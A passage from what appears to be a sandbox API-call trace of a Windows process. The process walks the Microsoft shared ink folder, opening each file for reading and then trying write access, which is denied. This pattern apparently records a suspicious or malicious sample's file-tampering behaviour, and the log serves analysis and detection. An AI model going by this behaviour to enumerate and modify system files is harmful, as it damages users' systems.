Files\\microsoft shared\\ink\\ipskor.xml", lpUsedDefaultChar=0x0) returned 62 [0084.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0084.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0084.623] AreFileApisANSI () returned 1 [0084.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.623] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0084.623] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 62 [0084.623] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.623] GetFileType (hFile=0x364) returned 0x1 [0084.623] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0084.624] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.624] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.624] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.624] CloseHandle (hObject=0x364) returned 1 [0084.624] AreFileApisANSI () returned 1 [0084.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.624] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e608 [0084.624] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e608, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml") returned 62 [0084.624] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.624] GetLastError () returned 0x5 [0084.624] GetLastError () returned 0x5 [0084.624] SetLastError (dwErrCode=0x5) [0084.624] GetLastError () returned 0x5 [0084.625] SetLastError (dwErrCode=0x5) [0084.625] GetLastError () returned 0x5 [0084.625] SetLastError (dwErrCode=0x5) [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0084.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.625] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.625] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d126e12, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe462e472, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe462e472, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0xa400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.625] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75d50 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0084.625] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fbb8 [0084.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75d50 | out: hHeap=0x20000) returned 1 [0084.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0084.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x50cf8 [0084.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fbb8 | out: hHeap=0x20000) returned 1 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x50cf8 | out: hHeap=0x20000) returned 1 [0084.626] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0084.626] AreFileApisANSI () returned 1 [0084.626] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll", lpUsedDefaultChar=0x0) returned 74 [0084.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6dc60 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0084.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0084.626] AreFileApisANSI () returned 1 [0084.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0084.626] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x85da0 [0084.626] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x85da0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 74 [0084.626] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.627] GetFileType (hFile=0x364) returned 0x1 [0084.627] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x85da0 | out: hHeap=0x20000) returned 1 [0084.627] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.627] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.627] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.627] CloseHandle (hObject=0x364) returned 1 [0084.627] AreFileApisANSI () returned 1 [0084.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 74 [0084.627] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x94) returned 0x854e0 [0084.627] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6dc60, cbMultiByte=-1, lpWideCharStr=0x854e0, cchWideChar=74 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll") returned 74 [0084.627] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.628] GetLastError () returned 0x5 [0084.628] GetLastError () returned 0x5 [0084.628] SetLastError (dwErrCode=0x5) [0084.628] GetLastError () returned 0x5 [0084.628] SetLastError (dwErrCode=0x5) [0084.628] GetLastError () returned 0x5 [0084.628] SetLastError (dwErrCode=0x5) [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x854e0 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6dc60 | out: hHeap=0x20000) returned 1 [0084.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.628] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.628] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cc20 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.628] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cc20 | out: hHeap=0x20000) returned 1 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.628] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x60088 [0084.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0084.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0084.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x60088 | out: hHeap=0x20000) returned 1 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0084.629] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.629] AreFileApisANSI () returned 1 [0084.629] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml", lpUsedDefaultChar=0x0) returned 62 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0084.629] AreFileApisANSI () returned 1 [0084.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.629] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e250 [0084.629] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e250, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 62 [0084.629] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x364 [0084.630] GetFileType (hFile=0x364) returned 0x1 [0084.630] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0084.630] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0084.630] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0084.630] SetFilePointerEx (in: hFile=0x364, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0084.630] CloseHandle (hObject=0x364) returned 1 [0084.630] AreFileApisANSI () returned 1 [0084.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0084.630] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e580 [0084.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x533b8, cbMultiByte=-1, lpWideCharStr=0x6e580, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml") returned 62 [0084.631] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnld.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsnld.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0084.631] GetLastError () returned 0x5 [0084.631] GetLastError () returned 0x5 [0084.631] SetLastError (dwErrCode=0x5) [0084.631] GetLastError () returned 0x5 [0084.631] SetLastError (dwErrCode=0x5) [0084.631] GetLastError () returned 0x5 [0084.631] SetLastError (dwErrCode=0x5) [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e580 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0084.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.631] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.631] FindNextFileW (in: hFindFile=0x78150, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d100bae, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x7d100bae, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x7d100bae, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xa14, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ipsnor.xml", cAlternateFileName="")) returned 1 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0084.631] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0084.631] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f848 [0084.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0084.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e608 [0084.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f848 | out: hHeap=0x20000) returned 1 [0084.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0084.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e608 | out: hHeap=0x20000) returned 1 [0084.632] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0084.632] AreFileApisANSI () returned 1 [0084.632] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\ipsnor.xml", lpUsedDefaultChar=0x0) returned 62 [0084.632] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0084.632] InitOnceExecuteOnce (in: 